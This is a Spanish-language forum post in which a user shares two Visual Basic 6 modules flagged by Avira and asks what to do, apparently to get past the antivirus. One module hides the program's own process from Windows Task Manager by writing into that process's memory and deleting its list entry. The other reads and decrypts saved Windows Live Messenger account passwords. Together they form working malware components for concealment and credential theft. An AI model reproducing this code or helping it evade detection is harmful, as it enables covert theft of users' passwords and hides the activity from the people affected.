Código 'vírico'

Iniciado por CAR3S?, 25 Abril 2011, 21:55 PM


CAR3S?

Holaaaaas   :P

:3

El Avira me detecta 2 módulos como víricos,

este es para ocultar el proceso del admin de tareas



' Module (first listing of the post): removes this program's own row from the
' Windows Task Manager process list ("Procesos" SysListView32) so the running
' process is not shown there. Everything below is the API plumbing for that.
Option Explicit
' Window lookup used by TimerProc / Procesos to find the Task Manager window
' and inspect each of its child windows (caption + class name).
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
' Carries the LVM_* list-view messages sent to the Task Manager's list control.
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

' Cross-process memory access. LVM_GETITEMW needs an LV_ITEM and a text buffer
' that live inside the Task Manager process, so OcultarItems allocates them there
' (VirtualAllocEx) and moves data in and out with Write/ReadProcessMemory.
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

' Win32 timer that drives TimerProc (armed in Ocultar, stopped in Mostrar).
Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long

' OpenProcess access rights combined in GetMemComp.
Const PROCESS_VM_OPERATION = &H8
Const PROCESS_VM_READ = &H10
Const PROCESS_VM_WRITE = &H20
' NOTE(review): 0 is not the Win32 PROCESS_ALL_ACCESS value; the constant is unused in this module.
Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&

' VirtualAllocEx / VirtualFreeEx flags. Only MEM_COMMIT, MEM_RESERVE and
' MEM_RELEASE are used in this module.
Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_DECOMMIT = &H4000
Const MEM_RELEASE = &H8000
Const MEM_FREE = &H10000
Const MEM_PRIVATE = &H20000
Const MEM_MAPPED = &H40000
Const MEM_TOP_DOWN = &H100000

Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

' List-view messages, all relative to LVM_FIRST (&H1000).
Private Const LVM_FIRST = &H1000
' Item count (the trailing & makes the constant a Long).
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)

' Unicode variant: the item text comes back as UTF-16 (see the StrConv in OcultarItems).
Private Const LVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
' 4104 = LVM_FIRST + 8.
Private Const LVM_DELETEITEM = 4104

' Mirrors the Win32 LVITEM structure: 10 Longs = 40 bytes (Len(li) is used as
' the size in OcultarItems). lpszText holds an address inside the *remote*
' process (the second buffer obtained from GetMemComp), not a local string.
Public Type LV_ITEM
mask As Long
iItem As Long
iSubItem As Long
State As Long
stateMask As Long
lpszText As Long 'LPCSTR
cchTextMax As Long
iImage As Long
lParam As Long
iIndent As Long
End Type

' 80-byte fixed buffer that receives the item text; cchTextMax is set to 80 to match.
Type LV_TEXT
sItemText As String * 80
End Type

' EnumChildWindows callback (registered by TimerProc via AddressOf). Reads the
' caption and class of each Task Manager child window; when it reaches the
' SysListView32 captioned "Procesos" (the processes list), OcultarItems runs on it.
'   hWnd2  - child window handle supplied by EnumChildWindows
'   lParam - the EnumChildWindows lParam (declared As String, never read here)
' Return: True keeps enumerating, False stops it. The Exit Function after
' OcultarItems leaves the Boolean default (False), so enumeration ends there;
' a child with neither caption nor class also stops it.
Public Function Procesos(ByVal hWnd2 As Long, lParam As String) As Boolean
Dim Nombre As String * 255, nombreClase As String * 255
Dim Nombre2 As String, nombreClase2 As String
Dim X As Long, Y As Long
' X / Y are the character counts actually written by the API.
X = GetWindowText(hWnd2, Nombre, 255)
Y = GetClassName(hWnd2, nombreClase, 255)

' Assigning back into a fixed-length String pads to 255 again, hence the Trim below.
Nombre = Left(Nombre, X)
nombreClase = Left(nombreClase, Y)
Nombre2 = Trim(Nombre)
nombreClase2 = Trim(nombreClase)
If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
OcultarItems (hWnd2)
Exit Function
End If
If Nombre2 = "" And nombreClase2 = "" Then
Procesos = False
Else
Procesos = True
End If
End Function

' Deletes this program's own row from the Task Manager process list.
'   hListView - handle of the "Procesos" SysListView32 (located by Procesos).
' Flow: find the owning process (GetWindowThreadProcessId), read the item count,
' allocate an LV_ITEM and an 80-byte text buffer inside that process, then for
' each row fill the remote LV_ITEM, send LVM_GETITEMW, read the text back and
' delete the row whose text equals App.EXEName & ".exe".
' The function has no declared return type (the original 'As Variant' is
' commented out) and its result is never used.
Private Function OcultarItems(ByVal hListView As Long) ' As Variant
Dim pid As Long, tid As Long
Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
Dim DirMemComp As Long, dwTam As Long
Dim DirMemComp2 As Long
Dim sLVItems() As String ' sized below but never filled
Dim li As LV_ITEM
Dim lt As LV_TEXT
If hListView = 0 Then Exit Function
' pid receives the process id that owns the list view; tid itself is not used.
tid = GetWindowThreadProcessId(hListView, pid)
nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
If nElem = 0 Then Exit Function
ReDim sLVItems(nElem - 1)
li.cchTextMax = 80
' dwTam = 40, the size of LV_ITEM.
dwTam = Len(li)
' hProceso is (re)assigned by each GetMemComp call; DirMemComp holds the remote
' LV_ITEM, DirMemComp2 the remote text buffer.
DirMemComp = GetMemComp(pid, dwTam, hProceso)
DirMemComp2 = GetMemComp(pid, LenB(lt), hProceso)
For i = 0 To nElem - 1
li.lpszText = DirMemComp2
li.cchTextMax = 80
li.iItem = i
li.mask = LVIF_TEXT
WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
' Blank the remote text buffer before each query.
lt.sItemText = Space(80)
WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
' wParam is 0 (iItem comes from the struct); lParam is the remote LV_ITEM address.
Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
' LVM_GETITEMW returned UTF-16 bytes, so they are converted before the compare.
' '<=== CAMBIAR' marks the name being matched: this program's own executable.
If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '<===========CAMBIAR
Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
' Returns here, so the CloseMemComp calls below are not reached on a match.
Exit Function
End If
Next i
CloseMemComp hProceso, DirMemComp, dwTam
CloseMemComp hProceso, DirMemComp2, LenB(lt)
End Function

' Opens process pid with VM read/write/operation rights and allocates memTam
' bytes of committed, read/write memory inside it.
'   hProceso (ByRef, out) - receives the handle returned by OpenProcess.
' Returns the remote base address (0 if VirtualAllocEx failed).
Private Function GetMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
GetMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function

' Releases a remote allocation obtained from GetMemComp and closes the
' process handle that came with it.
'   hProceso - handle from OpenProcess
'   DirMem   - remote base address
'   memTam   - size passed to VirtualFreeEx
Private Sub CloseMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
CloseHandle hProceso
End Sub
' Returns sInput cut at its first embedded NUL character; the input is
' returned unchanged when it contains no NUL.
'   sInput - string that may carry a C-style terminator
Private Function TrimNull(sInput As String) As String
Dim nulAt As Integer
nulAt = InStr(1, sInput, vbNullChar)
If nulAt = 0 Then
TrimNull = sInput
Else
TrimNull = Left$(sInput, nulAt - 1)
End If
End Function
' SetTimer callback (see Ocultar). On every tick it looks up the Task Manager
' window by its Spanish caption and, if found, walks its child windows with
' Procesos. The parameters mirror the SetTimer declaration; none is read here.
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
Dim Handle As Long
Handle = FindWindow(vbNullString, "Administrador de tareas de Windows")
' lParam 1 is passed through to Procesos, which does not use it.
If Handle <> 0 Then EnumChildWindows Handle, AddressOf Procesos, 1
End Sub

' Starts hiding: clears App.TaskVisible (VB's own task-list flag) and arms a
' 20 ms timer with id 0 on hwnd that repeatedly runs TimerProc.
'   hwnd - window that owns the timer (pass the same handle to Mostrar)
Public Sub Ocultar(ByVal hwnd As Long)
App.TaskVisible = False
SetTimer hwnd, 0, 20, AddressOf TimerProc
End Sub

' Stops the timer armed by Ocultar and restores App.TaskVisible. Rows already
' deleted from the Task Manager list are not put back by this routine.
'   hwnd - the window handle given to Ocultar
Public Sub Mostrar(ByVal hwnd As Long)
App.TaskVisible = True
KillTimer hwnd, 0
End Sub


Y este es para obtener las contraseñas guardadas del MSN.



Option Explicit

'---------------------------------------------------------------------------------------
' Module      : mMessengerPass
' DateTime    : 23/09/2008 11:24
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advance.com.ar
' Purpose     : Read WLM (>= 8.0) pass
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : No idea about the original author, It was a french guy tho
'
' History     : 23/09/2008 First Cut....................................................
'---------------------------------------------------------------------------------------


' Credential Manager + DPAPI plumbing used by EnumWLMAccounts. CredEnumerateW
' returns an array of CREDENTIAL pointers matching a filter string;
' CryptUnprotectData decrypts a credential blob under the calling user's
' DPAPI context (which is why the stored secrets are readable to any code
' running as that user).
Private Declare Function LocalFree Lib "kernel32.dll" (ByVal hMem As Long) As Long
Private Declare Function LocalAlloc Lib "kernel32.dll" (ByVal wFlags As Long, ByVal wBytes As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function CredEnumerate Lib "ADVAPI32.dll" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
Private Declare Function CredFree Lib "ADVAPI32.dll" (ByVal pBuffer As Long) As Long
Private Declare Function CryptUnprotectData Lib "crypt32.dll" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long
' Wraps a raw LPWSTR pointer into a VB String.
Private Declare Function SysAllocString Lib "oleaut32.dll" (ByVal pOlechar As Long) As String
Private Declare Function GetVersionEx Lib "kernel32.dll" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long

' Mirrors the Win32 CREDENTIALW layout (52 = &H34 bytes, the amount copied in
' EnumWLMAccounts). ftLastWritten is the 8-byte FILETIME, kept as a Double
' only for its size. The lpstr*/lp* members are pointers into CredEnumerate's buffer.
Private Type CREDENTIAL
    dwFlags                 As Long
    dwType                  As Long
    lpstrTargetName         As Long
    lpstrComment            As Long
    ftLastWritten           As Double
    dwCredentialBlobSize    As Long
    lpbCredentialBlob       As Long
    dwPersist               As Long
    dwAttributeCount        As Long
    lpAttributes            As Long
    lpstrTargetAlias        As Long
    lpUserName              As Long
End Type

' CryptUnprotectData in/out buffer: cbData = byte count, pbData = pointer.
Private Type DATA_BLOB
    cbData                  As Long
    pbData                  As Long
End Type

' ANSI OSVERSIONINFO for the GetVersionEx check in EnumWLMAccounts.
Private Type OSVERSIONINFO
    dwOSVersionInfoSize     As Long
    dwMajorVersion          As Long
    dwMinorVersion          As Long
    dwBuildNumber           As Long
    dwPlatformId            As Long
    szCSDVersion            As String * 128
End Type

' Lists the Windows Live Messenger accounts stored in the current user's
' Credential Manager and returns one text block per account: the target name
' ("Protocolo"), the user name ("Cuenta") and the password ("Contraseña").
' Returns "" when the OS check fails or no matching credential exists.
' Everything is read under the logged-on user's own DPAPI context, so no
' privilege beyond that user's is needed.
Public Function EnumWLMAccounts() As String
    Dim lMem        As Long
    Dim i           As Long
    Dim lCount      As Long
    Dim lCred       As Long
    Dim ub          As Long
    Dim lPtr        As Long
    Dim tCred       As CREDENTIAL
    Dim tBlobOut    As DATA_BLOB
    Dim tBlobIn     As DATA_BLOB
    Dim sPass       As String
    Dim vData       As Variant
    Dim tOSV        As OSVERSIONINFO
   
    ' Requires Windows XP (5.1) or later. Not binds after the comparison,
    ' so the test reads Not (major + minor/10 >= 5.1).
    With tOSV
        .dwOSVersionInfoSize = Len(tOSV)
        Call GetVersionEx(tOSV)
        If Not .dwMajorVersion + .dwMinorVersion / 10 >= 5.1 Then
            Exit Function
        End If
    End With
   
    ' 38 zero-initialised bytes (&H40 = LMEM_FIXED Or LMEM_ZEROINIT): room for
    ' the 18-character UTF-16 filter plus its terminator.
    lMem = LocalAlloc(&H40, 38)
   
    ' ASCII bytes of the CredEnumerate filter "WindowsLive:name=*".
    vData = Array( _
       &H57, &H69, &H6E, &H64, &H6F, &H77, &H73, &H4C, &H69, _
       &H76, &H65, &H3A, &H6E, &H61, &H6D, &H65, &H3D, &H2A)
   
    ' One byte at every even offset of the zeroed buffer = UTF-16LE for CredEnumerateW.
    For i = 0 To 17
        Call CopyMemory(ByVal lMem + (i * 2), CLng(vData(i)), &H1)
    Next
   
    ' lCount receives the match count, lCred a pointer to an array of CREDENTIAL pointers.
    Call CredEnumerate(lMem, 0, lCount, lCred)
   
    If lCount Then
        ' ub is still 0 here, so the loop runs over indices 0 .. lCount-1.
        For i = ub To ub + lCount - 1
       
            ' Dereference the i-th entry of the pointer array, then copy the
            ' 52-byte CREDENTIAL it points to.
            Call CopyMemory(ByVal VarPtr(lPtr), ByVal lCred + (i - ub) * 4, &H4)
            Call CopyMemory(ByVal VarPtr(tCred), ByVal lPtr, &H34)
   
            With tBlobIn
                .pbData = tCred.lpbCredentialBlob
                .cbData = tCred.dwCredentialBlobSize
           
                ' dwFlags 1 = CRYPTPROTECT_UI_FORBIDDEN; tBlobOut receives the result.
                Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, tBlobOut)

                ' sPass is sized for .cbData bytes of UTF-16 (cbData \ 2 characters)
                ' and filled straight from .pbData via StrPtr.
                sPass = Space(.cbData \ 2)
                Call CopyMemory(ByVal StrPtr(sPass), ByVal .pbData, .cbData)
            End With
           
            ' Target and user names are LPWSTRs: SysAllocString wraps them,
            ' StrConv(vbFromUnicode) turns the result into an ANSI VB string.
                       EnumWLMAccounts = EnumWLMAccounts & vbCrLf & vbCrLf & String(50, "-") & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Protocolo: " & StrConv(SysAllocString(tCred.lpstrTargetName), vbFromUnicode) & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Cuenta: " & StrConv(SysAllocString(tCred.lpUserName), vbFromUnicode) & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Contraseña: " & sPass & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf
         
        Next
        ub = ub + lCount
    End If
   
    ' Release the CredEnumerate array and the filter buffer.
    Call CredFree(lCred)
    Call LocalFree(lMem)
End Function




La verdad, no sé qué hay que hacer,

o sea, es como que estoy en el desierto sin brújula y tengo que ir al norte (en este desierto no hay sol xd) (?

¿Qué tengo que hacer?